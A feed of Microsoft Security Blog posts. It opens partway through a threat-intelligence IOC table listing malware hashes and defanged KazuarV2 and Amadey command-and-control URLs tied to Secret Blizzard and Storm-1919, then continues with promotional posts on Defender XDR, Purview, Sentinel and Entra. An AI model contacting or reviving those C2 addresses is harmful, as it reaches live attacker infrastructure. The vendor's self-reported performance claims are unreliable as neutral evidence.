| f9ebf6aeb3f0fb0c29bd8f3d652476cd1fe8bd9a0c11cb15c43de33bbce0bf68 | Executable susceptible to DLL-sideload (kavp.exe) | Secret Blizzard | Jan-April 2024 |
| d26ac1a90f3b3f9e11491f789e55abe5b7d360df77c91a597e775f6db49902ea | Survey tool (ddra.exe) | Secret Blizzard | April 2024 |
| d7e528b55b2eeb6786509664a70f641f14d0c13ceec539737eef26857355536e | PowerShell dropper for Amadey bot (nnas.ps1) | Secret Blizzard | March 2024 |
| hxxps://brauche-it[.]de/wp-includes/blocks/blocksu9ky0o | KazuarV2 C2 | Secret Blizzard | June 2024 |
| hxxps://okesense.oketheme[.]com/wp-includes/sodium_compat/sodium_compatT4FF1a | KazuarV2 C2 | Secret Blizzard | June 2024 |
| hxxps://coworkingdeamicis[.]com/wp-includes/Text/TextYpRm9l | KazuarV2 C2 | Secret Blizzard | June 2024 |
| hxxps://plagnol-charpentier[.]fr/wp-includes/random_compat/random_compata0zW7Q | KazuarV2 C2 | Secret Blizzard | June 2024 |
| dfdc0318f3dc5ba3f960b1f338b638cd9645856d2a2af8aa33ea0f9979a9ca4c | Amadey bot (av.exe / dctooux.exe) | Storm-1919 | March 2024 |
| ced8891ea8d87005de989f25f0f94634d1fc70ebb37302cf21aa0c0b0e13350f | Amadey bot (dctooux.exe) | Storm-1919 | March 2024 |
| ee8ef58f3bf0dab066eb608cb0f167b1585e166bf4730858961c192860ceffe9 | MASM32 utility (procmap.exe) | Storm-1919 | March 2024 |
| hxxp://vitantgroup[.]com/xmlrpc.php | Amadey C2 | Storm-1919 | March 2024 |
For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog: https://aka.ms/threatintelblog.
To get notified about new publications and to join discussions on social media, follow us on LinkedIn at https://www.linkedin.com/showcase/microsoft-threat-intelligence, and on X (formerly Twitter) at https://twitter.com/MsftSecIntel.
To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast: https://thecyberwire.com/podcasts/microsoft-threat-intelligence.
The post Frequent freeloader part II: Russian actor Secret Blizzard using tools of other groups to attack Ukraine appeared first on Microsoft Security Blog.
Microsoft Defender XDR demonstrates 100% detection coverage across all cyberattack stages in the 2024 MITRE ATT&CK® Evaluations: Enterprise
For the sixth year in a row, Microsoft Defender XDR demonstrated industry-leading extended detection and response (XDR) capabilities in the independent MITRE ATT&CK® Evaluations: Enterprise. The cyberattack used during the detection test highlights the importance of a unified XDR platform and showcases Defender XDR as a leading solution for securing your multi-operating system estate, with the following results:
Figure 1. Diagram of Microsoft Defender XDR’s MITRE Tactics, Techniques, and Procedures (TTP) coverage for all cyberattack stages in Detection.
- Achieved industry-leading, cross-platform detection: 100% technique-level detections across all attack stages for Linux and macOS threats, leveraging our new extended Berkeley Packet Filter (eBPF) Linux sensor and macOS behavioral monitoring engine that deliver rich, actionable content.
- Delivered zero false positives, providing powerful security without overwhelming the security operations center (SOC). Defender XDR accurately alerted on and blocked only malicious activity every time so the SOC can focus their limited time and resources on responding to real cyberthreats at hand. Key to this result are critical cross-platform capabilities like remote encryption detection for gaining deeper visibility into the cyberattacker’s machines and behavior monitoring for detecting emerging threats on macOS.
- Equipped the SOC with powerful technology like Microsoft Security Copilot, the industry’s first generative AI for security, to thwart attacks with contextual insight and speed, with capabilities like script analysis that translates obfuscated PowerShell scripts into intuitive explanations of a script’s role in the cyberattack.
- Deep visibility into remote encryption, providing unprecedented visibility into encryption attempts originating from remote machines that might not even be onboarded to Defender XDR and putting an end to an advanced cyberattack vector being used in over 70% of recent ransomware cases.¹
Defender XDR is the industry’s broadest natively integrated XDR platform spanning endpoints, hybrid identities, email, collaboration tools, software as a service (SaaS) apps, and data with centralized visibility, powerful analytics, and automatic attack disruption, a powerful response capability unique to Microsoft.
A note on this year’s emulation: It is Microsoft’s opinion that the Protection test does not mirror realistic cyberthreats that organizations face. The Protection test methodology differed significantly from the Detection test that emulated an end-to-end attack scenario reflective of the cyberthreat landscape. See our statement below.
Customer reality is core to Microsoft’s testing approach
Microsoft Security’s mission is to build a safer world while enabling all organizations, users, and services to be as productive as possible. On the ground this means equipping security analysts with a holistic, actionable view of the cyberthreat landscape to minimize time to remediate legitimate bad actors.
As we develop our product, we strive to find the right balance between providing industry-leading security while ensuring under-sourced security operations teams are not flooded with false positives. We hold ourselves accountable for delivering on this goal by regularly participating in product evaluations to identify gaps and improve our products. This year, our conclusion from the MITRE protection test is that it was designed to evade protection mechanisms to the extent that it is unrepresentative of an actual cyberattack, a methodology that Microsoft disagrees with.
The core issue is the micro-testing methodology, which is inconsistent with how cyberattackers typically operate, moving laterally within organizations by gaining access to identities and privileges over time. These broader signals are critical for distinguishing between benign and malicious activities so we can balance protecting organizations from cyberattacks while supporting the broadest set of benign use cases across a massive customer base worldwide.
For example, MITRE used “micro emulations” starting with a highly privileged user and applications signed by a trusted certificate to conduct cyberattack steps in isolation without adequate context. Signed apps executed by privileged users is a benign scenario we see on thousands of Windows machines a day. Using a trusted certificate isn’t suspicious unless the associated user was compromised—context that the MITRE test lacked. Nor were there signals provided to enable us to determine that the certificate in the trusted root authority had been compromised or was seen to be signing malicious applications.
Microsoft will not implement the test’s recommendations as they do not reflect cyberattack patterns on customer environments. Doing so would cause outages for legitimate customer scenarios.
We appreciate the ongoing collaborative dialogue with MITRE on the topic of testing methodology and look forward to our continued partnership into the future.
How Microsoft fended off adversaries in the Detection test
In previous evaluations, MITRE scoped emulated behaviors to a specific cyberthreat actor group, like Secret Blizzard. This year, MITRE has added ransomware as an attack category informing a range of malicious behaviors carried out against Windows and Linux. For the macOS portion of the emulation, MITRE applied adversarial behaviors inspired by cyberthreat actors that the Democratic People’s Republic of Korea (DPRK) sponsors. Microsoft Threat Intelligence tracks these groups at a granular level, for example, Sapphire Sleet, Ruby Sleet, Moonstone Sleet, and others that commonly escalate privileges and target user credentials on macOS.
Figure 2. Diagram of participating vendors’ TTP coverage for all cyberattack stages in Detection.
Let’s take a closer look at how Microsoft Defender XDR once again achieved industry-leading results in this year’s MITRE evaluation and how Microsoft is shaping the future of security to respond to the most prevalent cyberthreats like ransomware.
A leader in detection for every cyberattack stage: 100% technique-level detections for Linux and macOS cyberthreats
Figure 3. Diagram of Microsoft Defender XDR’s MITRE TTP coverage for Linux and macOS in Detection.
Organizations often have diverse digital estates spanning multiple operating systems, which is why Microsoft invests heavily in ensuring detection for all major operating systems is both accurate and actionable. Microsoft’s industry-leading cross-platform results are driven by a combination of continuous investments, such as:
1. Extending our generative AI solution, Security Copilot, beyond Windows.
Security Copilot is the only security AI product that combines a specialized language model with security-specific capabilities from Microsoft. These capabilities incorporate a growing set of security-specific skills informed by our unique global threat intelligence and more than 78 trillion daily signals. Summarizing incidents, guiding response actions, using natural language for advanced threat hunting, and analyzing obfuscated PowerShell scripts are just some of the ways Security Copilot helps analysts accelerate workflows and gain new skills. In this evaluation, script analysis played a key role for macOS where we see human-readable explanations alongside the code as well as MITRE Tactics, Techniques, and Procedures (TTPs). This way analysts can quickly understand how the adversary is using the file or script.
Figure 4. Step 2.5 – System Services – launchctl (T1569.001), alongside Security Copilot script analysis for macOS that makes alerts more actionable.
2. Delivering enhanced behavioral monitoring capabilities to detect emerging cyberthreats even earlier on macOS.
Effective security is about the quality and actionability of detections, not just the quantity. These principles guide how we’ve built industry-leading security across Windows, Linux, and macOS. Let’s look at step Mac 4.08 Credentials from Password Stores: Keychain by a suspicious file as an example. Keychain-related file access happens often on macOS, even when a machine is idle. On average, these files may be accessed well over 400 times per hour. This level of activity is normal for many popular applications, such as OneDrive, Adobe Creative Cloud, and the built-in macOS apps. However, sorting out normal versus suspicious access poses a significant challenge for many vendors. We gain this deeper analysis through a combination of advanced behavior monitoring and content scanning, along with Microsoft’s exclusive threat intelligence. This approach helps pinpoint genuinely suspicious access, like those from us.zoom.ZoomHelperTool, providing analysts with the precise data they need to respond effectively.
Figure 5. Our macOS and other cross-platform customers also receive the full context provided on Windows about a malicious file’s capabilities, including a list of MITRE TTPs, strings, imports, and many other file attributes, giving comprehensive context on a cyberattack within a single portal experience.
Figure 6. macOS suspicious file alert with a clear description and information on why us.zoom.ZoomHelperTool was considered a suspicious file. Information generated by multivariate machine learning models.
Zero false positives across Linux, macOS, and Windows
When benign activities are flagged as malicious, security analysts end up wasting time and resources investigating. At a scale of potentially hundreds to thousands of alerts a day, false positives quickly lead to team burnout and eroded trust in security measures. This year, MITRE introduced a false positive metric by weaving innocuous actions like legitimate file-sharing into the cyberattack steps to see if evaluated solutions would generate unnecessary alerts. Microsoft employs machine learning-based detections, only alerting on anomalous activity that seems to originate from malicious intent. This approach is how we deliver powerful security without overwhelming the SOC.
Microsoft’s dedication to protection with minimal false positives is evident in regularly occurring, public antivirus assessments conducted by endpoint testing authorities like AV-Comparatives, AV-Test, and SE Labs.
Figure 7. Number of false positives generated in this year’s MITRE evaluation.
Deep visibility into remote encryption attempts
Since 2022, Microsoft has observed a spike in cyberattackers using remote encryption, where a cyberattacker uses a compromised device to encrypt other devices in a given network. As the latest Microsoft Digital Defense Report points out, 70% of successful human-operated ransomware cyberattacks have applied this technique. Gaining insight into a cyberattacker’s machine is typically a blind spot for many antivirus and endpoint detection and response solutions. Defender XDR, however, provides analysts with this critical visibility so that even if an unmanaged device is compromised, it can protect your hybrid organization from advanced cyberattacks like ransomware.
Figure 8. Step 16.36 – Data Encrypted for Impact (T1486).
Empowering defenders with the security they need
As the cyberthreat landscape rapidly evolves, Microsoft is committed to empowering defenders with industry-leading, cross-platform XDR. Our evaluation philosophy is to reflect the real world by configuring the product as customers would in line with industry best practices. In the MITRE Evaluations, as with all simulations, Microsoft Defender XDR achieved industry-leading results without manual processing or fine-tuning and can be run in customer environments without generating an untenable number of false positives. Microsoft’s commitment to delivering cybersecurity while minimizing false positives is reflected in regularly occurring public evaluations.
We thank MITRE Engenuity for the opportunity to contribute to and participate in this year’s evaluation.
To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us on LinkedIn (Microsoft Security) and X (@MSFTSecurity) for the latest news and updates on cybersecurity.
¹ Microsoft Digital Defense Report 2024
The post Microsoft Defender XDR demonstrates 100% detection coverage across all cyberattack stages in the 2024 MITRE ATT&CK® Evaluations: Enterprise appeared first on Microsoft Security Blog.
New Microsoft Purview features help protect and govern your data in the era of AI
In today’s evolving digital landscape, safeguarding data has become a challenge for organizations of all sizes. The ever-expanding data estate, the volume and complexity of cyberattacks, increasing global regulations, and the rapid adoption of AI are shifting how cybersecurity and data teams secure and govern their data. Today, more than 95% of organizations are implementing or developing an AI strategy, requiring data protection and governance strategies to be optimized for AI adoption.¹ Microsoft Purview is designed to help you protect and govern all your data, regardless of where it lives and travels, for the era of AI.
Historically, organizations have relied on the traditional approach to data security and governance, largely involving stitching together fragmented solutions. According to Gartner®, “75% of security leaders are actively pursuing a security vendor consolidation strategy as of 2022.”² Consolidation, however, is no easy feat. In a recent study, more than 95% of security leaders acknowledge that unifying the handling of data security, compliance, and privacy across teams and tools is both a priority and a challenge.³ These approaches often fall short because of duplicate data, redundant alerts, and siloed investigations, ultimately leading to increased data risks. Over time, this approach has been increasingly difficult for organizations to maintain.
Unify how you protect and govern your data with Microsoft Purview
Unlike traditional data security and governance strategies that require disparate solutions to achieve comprehensive data protection, Microsoft Purview is purpose-built to unify data security, governance, and compliance into a single platform experience. This integration aims to reduce complexity, simplify management, and mitigate risk, while helping enhance efficiency across teams to support a culture of collaboration. With Microsoft Purview you can:
- Enable comprehensive data protection.
- Support compliance and regulatory requirements.
- Help safeguard AI Innovation.
To meet our growing customer needs, the team has been delivering a lot of innovation at a rapid pace. In this blog, we’re excited to recap all the new capabilities we announced at Microsoft Ignite last month.
Enable comprehensive data protection
Microsoft Purview enables you to discover, secure, and govern data across Microsoft and third-party sources. Today, Microsoft Purview delivers rich data security capabilities through Microsoft Purview Data Loss Prevention, Microsoft Purview Information Protection, and Microsoft Purview Insider Risk Management, enhanced with AI-powered Adaptive Protection. To drive AI transformation, you need to build and maintain a strong data foundation, categorized by data that is not just secured but also governed. Microsoft Purview also addresses your data governance needs with the newly reimagined Microsoft Purview Unified Catalog. These data security and data governance products leverage shared capabilities such as a common data catalog, connectors, classifications, and audit logs—helping reduce the inconsistencies, inefficiencies, and exposure gaps commonly experienced when using disparate tools.
Introducing Microsoft Purview Data Security Posture Management
Microsoft Purview Data Security Posture Management (DSPM) provides visibility into data security risks and recommends controls to protect that data. DSPM provides contextual insights, usage analysis, and continuous risk assessments of your data, helping you mitigate risks and enhance data security. With DSPM, you get a shared understanding of key risks through a series of reports that correlate insights across location and type of sensitive data, risky user activities, and common exfiltration channels. In addition, DSPM provides actionable, scenario-based recommendations for detection and protection policies. For example, DSPM can help you create an Insider Risk Management policy that identifies risky behavior such as downgrading labels in documents followed by exfiltration, and a data loss prevention (DLP) policy to block that exfiltration at the same time.
DSPM also brings a view of historical trends and insights based on sensitivity labels applied, sensitive assets covered by at least one DLP policy, and potentially risky users, to show the effectiveness of your data security policies over time. And finally, DSPM leverages the power of generative AI through its deep integration with Microsoft Security Copilot. With this integration, you can easily uncover risks that might not be immediately apparent and drive efficient and richer investigations—all in natural language.
With DSPM, you can easily identify possible labeling and policy gaps such as unlabeled content and users that aren’t scoped in a DLP policy, unusual patterns and activities that might indicate potential risks, as well as opportunities to adapt and strengthen your data security program.
Figure 1. DSPM overview page provides centralized visibility across data, users, and activities, as well as access to reports.
Learn more about this announcement in the Data Security Posture Management blog.
Increasing data security and security operations center integration
Understanding data and user context is vital for improving security operations and prioritizing investigations, especially when sensitive data is at stake. By integrating insights such as data classification, access controls, and user activity into the security operations center (SOC) experience, organizations can better assess the impact of security incidents, reduce false alerts, and enhance containment efforts. In addition to the already present DLP alerts in the Microsoft Defender XDR incident investigation and data security remediation actions enabled directly from Defender XDR, we’ve also added Insider Risk Management context to the user entity page to provide a more comprehensive view of user activities.
With Microsoft Purview’s latest integration with Microsoft Defender, now in preview, you get insider risk alerts in Defender XDR and can correlate them with incidents. This gives you critical user context for your security investigations. SOC teams can now better distinguish internal incidents from external cyberattacks and refine their response strategies. For more complex analysis to identify risks such as attack patterns, we are integrating insider risk signals into Defender XDR’s Advanced Hunting, giving you deeper insights and allowing you to improve your policies in partnership with data security teams. Together, these advancements allow your organization to stay ahead of evolving cyberthreats, providing a collaborative and data-driven approach to security.
Learn more about this announcement in the Purview Insider Risk Management blog.
Protecting data and preventing sensitive data loss
As AI generates new data in unprecedented volumes, the need to secure that data and prevent the loss of sensitive information has become even more crucial. Our new DLP capabilities help you effectively investigate DLP incidents, fortify existing protections, and refine your overall DLP program. You can now customize Purview DLP to the established processes of your organization with the Microsoft Power Automate connector in preview. This lets you automate and customize your DLP policy actions through Power Automate workflows to integrate your DLP incidents into new or established IT, security, and business operations workflows, like stakeholder awareness or incident remediation.
DLP policy insights in Security Copilot, also in preview, summarize existing DLP policies in natural language and help you understand any gaps in policy coverage across your environment. This makes it easier for you to quickly and easily understand the full breadth of DLP policy coverage across your organization and address gaps in protection. We are also enhancing DLP protections on endpoints by expanding our file type coverage from more than 40 to more than 110 file types. Users can also now store and view full files on Windows devices as evidence for forensic investigations using Microsoft-managed storage. With the Microsoft-managed option, your admins can save time otherwise spent configuring additional settings, assigning permissions, and selecting the storage in the policy workflow. Finally, you can now enforce blanket protections on file types that cannot currently be scanned or classified by endpoint DLP, such as blocking copy to removable media for all computer-aided design (CAD) files regardless of those files’ contents. This helps ensure that the diverse range of file types found in your environment is still protected even if those files cannot currently be scanned and classified by Microsoft Purview endpoint DLP.
Learn more about these announcements in our Microsoft Purview Data Loss Prevention blog.
Microsoft Purview Data Governance innovations to drive greater business value
Research indicates that data practitioners spend 80% of their time finding, cleaning, and organizing data, leaving only 20% of time to process and analyze it.⁴ To simplify the data governance practice in the age of AI, the Microsoft Purview Unified Catalog is a comprehensive enterprise catalog that automatically inventories and tags your organization’s critical data assets. This gives your business users the ability to search for specific business data when building analytics reports or AI models. The Unified Catalog gives you visibility and confidence in your data across your disparate data sources and local catalogs with built-in data quality management and end-to-end lineage. You can integrate metadata from diverse catalogs such as Fabric OneLake, Databricks Unity, and Snowflake Polaris into a unified catalog for all your data stewards, data owners, and business users.
Now in preview, Unified Catalog provides deeper data quality through a new scan engine that supports open standard file and table formats for big data platforms, including Microsoft Fabric, Databricks Unity Catalog, Snowflake, Google BigQuery, and Amazon S3. This new scan engine enables rich data quality management at the asset level for overall improved data quality health. Lastly, Microsoft Purview Analytics in OneLake (preview) allows you to extract tenant-specific metadata from the Unified Catalog and export it directly into OneLake. You can then use Microsoft Power BI to analyze the metadata to further understand and report on your data’s quality and lineage.
Learn more about these announcements in our Microsoft Purview Data Governance blog.
Support compliance and regulatory requirements
As regulatory requirements evolve with the proliferation of AI, it is more critical than ever for businesses to keep compliance and privacy top of mind. However, adhering to requirements is becoming increasingly complex, while consequences for non-compliance are growing more severe. Microsoft Purview empowers you to address regulatory demands and comply with corporate policies by offering compliance and privacy controls that are both scalable and adaptable to changing needs.
New templates in Compliance Manager to help simplify compliance
Microsoft Purview Compliance Manager provides insights into your organization’s compliance status through compliance templates and provides suggested actions and next steps to help you along your compliance journey. Compliance Manager continues to add new templates to help you address new and evolving regulations, including templates for the European Union AI Act (EUAI Act), NIST 2 AI, ISO 42001, ISO 23894, the Digital Operational Resilience Act (DORA), and additional industry and regional regulations. Compliance Manager now includes historical records that help track your organization’s compliance and provides actionable next steps to understand how new regulations or policies affect your compliance score over time. In addition, you can now leverage custom templates to address both regulatory requirements and your organization’s specific policies and preferences.
Figure 2. EUAI Act Assessment in Compliance Manager.
Learn more about this announcement in the Microsoft Purview Compliance Manager blog.
New Microsoft Purview controls for ChatGPT Enterprise with integration with OpenAI for improved compliance
Microsoft Purview now integrates with ChatGPT Enterprise, allowing you to gain visibility and govern the prompts and responses of your ChatGPT Enterprise interactions. This integration, currently in preview, includes Microsoft Purview Audit for auditing ChatGPT Enterprise interactions, Microsoft Purview Data Lifecycle Management for enabling retention and deletion policies, Microsoft Purview Communication Compliance to proactively detect regulatory and corporate policy violations, and Microsoft Purview eDiscovery to streamline legal investigations.
Learn more about all these announcements in our Security for AI blog.
Microsoft Purview is built to help safeguard AI innovation
With the rapid adoption of AI, new vulnerabilities have emerged, highlighting the need for strong data security and governance of AI workloads. Microsoft Purview is built to secure and govern data related to pre-built and custom-built AI apps.
Introducing Microsoft Data Security Posture Management for AI (DSPM for AI)
Security teams often find themselves in the dark when it comes to data security and compliance risks associated with AI usage. Without proper visibility, organizations often struggle to safeguard their AI assets effectively. DSPM for AI, now generally available, gives you visibility through a centralized dashboard and reports, enables you to proactively discover and manage your AI-related data risks, such as sensitive data in user prompts, and gives you actionable recommendations and real-time insights to respond effectively to security incidents.
Microsoft Purview controls for Microsoft 365 Copilot help prevent data oversharing
Data oversharing occurs when users have access to more data than necessary for their job duties. Organizations need effective data security controls to help mitigate this risk. At Microsoft Ignite we announced a number of new Microsoft Purview capabilities in preview to prevent data oversharing in Microsoft 365 Copilot.
Data oversharing assessments: Discover data that is at risk of oversharing by scanning files containing sensitive data, identifying risky data sources such as SharePoint sites with overly permissive user access, and by providing recommendations such as auto-labeling policies and default labels to prevent sensitive data from being overshared. The oversharing assessment report can identify unlabeled files accessed by users before deploying Copilot or can be run post-deployment to identify sensitive data referenced in Copilot responses.
Label-based permissions: Microsoft 365 Copilot honors permissions based on sensitivity labels assigned by Microsoft Purview when referencing sensitive documents.
Purview DLP for Microsoft 365 Copilot: You can create DLP policies to exclude documents with specified sensitivity labels from being processed, summarized, or used in responses in Microsoft 365 Copilot, preventing sensitive data from being inadvertently overshared.
New Microsoft Purview capabilities to detect risky activities in Microsoft 365 Copilot
Security teams need ways to detect risky use of AI applications, such as deliberate or accidental access to sensitive data, jailbreaks, and copyright violations. Insider Risk Management and Communication Compliance now provide risky AI usage indicators, a policy template, and an analytics report in preview to help detect and investigate the risky use of AI. These new capabilities not only help detect risky activities and prompts but also integrate with Microsoft Defender XDR, enabling your security teams to investigate new AI-related risks holistically alongside other risks, such as identity risks through Microsoft Entra and data oversharing and data loss risks through Purview DLP.
New Microsoft Purview capabilities for agents built with Microsoft Copilot Studio
When new and citizen developers build low-code or no-code AI, they often lack the security expertise and tools to enable security and compliance controls. Microsoft Purview now provides data controls for agents built in Copilot Studio to enable low-code and no-code developers to build more secure agents. For example, when an agent built with Copilot Studio accesses sensitive data, it will recognize and honor the sensitivity labels of the data being accessed. Microsoft Purview will also protect sensitive data generated by the agent through label inheritance and will enforce label permissions, ensuring only authorized users have access.
Data security admins also get visibility into the sensitivity of data in user prompts and agent responses within DSPM for AI. Moreover, Microsoft Purview will enable you to detect anomalous user activity and risky or non-compliant AI use and apply retention or deletion policies on your agent prompts and responses. These new controls give you visibility and insights into risks for your agents built with Copilot Studio, strengthening your data security posture.
Learn more about all these announcements in our Security for AI blog.
Unified solutions that empower your organization
As you navigate the complexities of AI proliferation, regulatory requirements, and security threats, we are excited to innovate, invest in, and expand the capabilities of Microsoft Purview to address your most pressing data security, governance, and compliance challenges.
Get started with Microsoft Purview today
To get started, we invite you to try Microsoft Purview free and to learn more about Microsoft Purview today.
- Read the Data Security Index report.
- Read our new whitepaper: Accelerating AI transformation by prioritizing security, a path to implementing effective security for AI that enables innovation.
- Watch Microsoft Purview sessions from Microsoft Ignite.
- Try Microsoft Purview for free.
To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us on LinkedIn (Microsoft Security) and X (@MSFTSecurity) for the latest news and updates on cybersecurity.
[1] Microsoft internal research, May 2023.
[2] Gartner, Innovation Insight for Security Platforms, Peter Firstbrook, Craig Lawson. October 16, 2024. GARTNER is a registered trademark and service mark of Gartner, Inc. and/or its affiliates in the U.S. and internationally and is used herein with permission. All rights reserved.
[3] Microsoft internal research, August 2024.
[4] Overcoming the 80/20 Rule in Data Science, Pragmatic Institute.
The post New Microsoft Purview features help protect and govern your data in the era of AI appeared first on Microsoft Security Blog.
Why security leaders trust Microsoft Sentinel to modernize their SOC
Security information and event management (SIEM) solutions have long served as the indispensable nerve center for the security operations center (SOC). However, the SIEM landscape has undergone seismic shifts and market disruption in recent times, making it that much harder for chief information security officers (CISOs) to navigate and select the optimal SIEM for their needs.
Several well-established, traditional SIEMs have been acquired by bigger vendors, raising uncertainty around their future product roadmap and long-term support commitments. Additionally, legacy on-premises SIEMs demand substantial infrastructure investments, require extensive configuration expertise, and constant maintenance—resulting in high operational costs and inefficiencies. Even more critically, traditional SIEMs often struggle to scale or adapt to the evolving cyberthreat landscape. Their rigid architecture and lack of flexibility leave organizations exposed to sophisticated, fast-changing threats.
In contrast, newer entrants to the SIEM market, typically founded in adjacent security markets, promise innovation but often lack maturity, proven reliability, and feature completeness. Their solutions can leave organizations grappling with gaps in coverage or integration challenges. Similarly, data lake providers have entered the scene with do-it-yourself security solutions that involve complex, multivendor integrations. While these may appeal to organizations seeking flexibility, they frequently demand high levels of customization and operational expertise—an approach yet to demonstrate consistent success.
Security operation centers require a modern SIEM
As cyberattacks continue to increase in frequency and sophistication, an effective and comprehensive SIEM has never been more important. Given the churn in the industry, Microsoft Sentinel stands out as an established leader in the category, delivering results and innovation year after year. Many CISOs are switching to Microsoft Sentinel to gain cloud flexibility and broad coverage to protect the entire digital ecosystem. In fact, today, more than 25,000 customers trust Microsoft Sentinel to help them stay ahead of even the most emergent cyberthreats, driving innovation with next generation AI and automation, strong threat intelligence, and robust, built-in capabilities. Learn more about why Microsoft Sentinel is the choice for security professionals.
Protect everything with a comprehensive SIEM solution
Microsoft Sentinel’s robust, built-in capabilities are designed to secure your entire multicloud, multiplatform ecosystem. It integrates seamlessly with Microsoft 365, Microsoft Azure services, and a wide range of third-party applications, providing a unified view of your security landscape.
- Empower security teams with full-spectrum SIEM capabilities including security orchestration, automation, and response (SOAR), threat intelligence platform, generative AI, user and entity behavior analytics (UEBA), and native integration with extended detection and response (XDR).
- Secure your entire digital estate with more than 350 data collectors.
- Streamline the analyst experience with the unified security operations platform.
- Address a wide range of scenarios with a library of out-of-the-box playbooks, dashboards, and detection rules, including more than 200 Microsoft-created solutions, more than 280 community contributions, and more than 21,000 GitHub commits.
Microsoft Sentinel empowers SOCs to proactively address cyberthreats with world-class AI and global threat intelligence. Its advanced models identify anomalies and sophisticated attacks that traditional SIEMs can miss. By leveraging continuous updates from Microsoft’s global threat intelligence feed, your SOC is better equipped to handle the evolving digital threat landscape.
- Achieve efficiency gains from the reduction of false positives by up to 79%.[1]
- Detect threats 50% faster with unified correlation engine across SIEM and XDR alerts.[2]
- Increase efficiency with automation playbooks.
- Gain actionable insights from threat intelligence powered by 78 trillion daily signals reasoned over with AI and 10,000 world-class security experts.
- Complete tasks 22% faster and accelerate mean time to resolution by 30% with Security Copilot embedded into the analyst workflow.[2]
As a cloud-native SIEM, Microsoft Sentinel eliminates the need for upfront infrastructure investments, enabling organizations to scale their security operations seamlessly with unparalleled flexibility to address evolving business needs. Security teams can achieve significant cost savings by leveraging dynamic SOC recommendations that optimize resource allocation, streamline processes, and enhance threat response efficiency, enabling organizations to maximize the value of their security investments.
- Composite organization experienced a return on investment of 234% over three years.[1]
- Expand coverage with a low-cost tier built for high volume logs (for example: network, firewall, and proxy).
- Dynamic, tailored recommendations to maximize security value and optimize costs.
- Simplify and accelerate implementation with migration tools.
Microsoft Sentinel is transforming how SOCs operate by offering a cloud-native, AI-powered solution that scales with your organization’s needs. Its comprehensive capabilities, from full-spectrum SIEM features to advanced AI and automation, help security teams detect, respond to, and mitigate cyberthreats faster and more effectively.
Whether you’re looking to eliminate the inefficiencies of legacy SIEM systems, simplify threat management, or scale cost effectively, Microsoft Sentinel provides a game-changing solution for the modern SOC.
Learn more
Learn more about Microsoft Sentinel, and read the Microsoft Sentinel datasheet.
[1] Forrester Total Economic Impact™ of Microsoft Sentinel, a commissioned study conducted by Forrester Consulting, March 2024. Results are based on a composite organization representative of interviewed customers.
[2] Generative AI and Security Operations Center Productivity: Evidence from Live Operations, Microsoft study by James Bono, Alec Xu, Justin Grana. November 24, 2024.
The post Why security leaders trust Microsoft Sentinel to modernize their SOC appeared first on Microsoft Security Blog.
8 years as a Leader in the Gartner® Magic Quadrant™ for Access Management
In mid-October, we released our 2024 Microsoft Digital Defense Report, which revealed over 600 million identity attacks per day. As multifactor authentication now blocks most password-based attacks, we’re seeing a shift in threat actor tactics and a convergence of nation-state and cybercriminal threat activity. More than 99% of identity attacks are password attacks—often due to predictable human behaviors like easy-to-guess passwords, password reuse, and falling prey to phishing attacks.[1] That’s why comprehensive, integrated identity and access management (IAM) should be a core part of any organization’s threat-informed defense. Today we’re honored to announce that for the eighth year in a row, Microsoft has been named a Leader in the 2024 Gartner® Magic Quadrant™ for Access Management—placed highest on the Ability to Execute axis.
Delivering on identity and access management for customers
We believe our 2024 Gartner® Magic Quadrant™ recognition validates our commitment to delivering a comprehensive, AI-powered and automated identity portfolio to customers, with Microsoft Entra. It empowers customers to protect their digital everything with a simplified user experience that makes identity and access management (IAM) easier than ever before. And it’s informed by our customers and partners—to whom we thank and share this honor.
Source: Gartner
Microsoft Entra is a unified identity and network access solution that protects any identity and secures access to any application or resource, in any cloud or on-premises. It’s a single place with a simplified user experience for security professionals. Microsoft Entra allows organizations to:
- Use adaptive identity and network access controls to secure access to any app or resource, from anywhere.
- Protect and verify every identity with consistent security policies for every user—employees, frontline workers, customers, and partners—as well as apps, devices, and workloads across multicloud and hybrid environments.
- Provide only the access necessary with right-size permissions, access lifecycle management, and least-privilege access for any identity.
We’re especially proud of this recognition in our eighth year recognized as a Leader, and share our thanks to our customers, partners, and team members for their contributions and support.
Looking to the future
As we celebrate this year’s recognition, we’re also hard at work on new and expanded features—looking ahead to meet customers’ changing IAM needs as our collective threat landscape continues to evolve.
Microsoft Entra ID currently supports device-bound passkeys stored on FIDO2 security keys and in Microsoft Authenticator. And we’re investing in both synced and device-bound passkeys for work accounts. For enterprises that use passwords today, passkeys provide a seamless way for workers to authenticate without entering a username or password. Passkeys provide improved productivity for workers and have better security. Read more about requirements and instructions to enable passkeys for your organization.
Microsoft Security Copilot, now in public preview, is embedded in Microsoft Entra—helping customers investigate and resolve identity risks, assess identities and access with AI-powered intelligence, and complete complex tasks quickly. Built on top of real-time machine learning, Copilot in Microsoft Entra can help your teams find gaps in access policies, generate identity workflows, and troubleshoot faster. You can also unlock new skills that allow admins at all levels to complete complex tasks such as incident investigation, sign-in log analysis, and more, to gain savings in time and resources. Read more about the key features of Copilot in Microsoft Entra.
Microsoft is working with a diverse community to create a decentralized identity solution that puts individuals in charge of their own digital identities, providing a secure and private way to manage identity data without relying on centralized authorities or intermediaries. With Face Check with Microsoft Entra Verified ID, enterprises can perform high-assurance verifications securely, simply, and at scale. Powered by Azure AI services, Face Check adds a critical layer of trust by performing facial matching between a user’s real-time selfie and a photo. Read more about the prerequisites and setup requirements for Face Check with Microsoft Entra Verified ID.
Learn more
You can learn more by reading the full 2024 Gartner® Magic Quadrant™ for Access Management report. To learn more about the Microsoft Entra portfolio and its products, visit our website.
Are you a regular user of Microsoft Entra ID? Review your experience on Gartner Peer Insights™ and get a $25 gift card.
[1] Microsoft Digital Defense Report, Microsoft. 2024.
This graphic was published by Gartner, Inc. as part of a larger research document and should be evaluated in the context of the entire document. The Gartner document is available upon request from Microsoft.
Gartner does not endorse any vendor, product, or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.
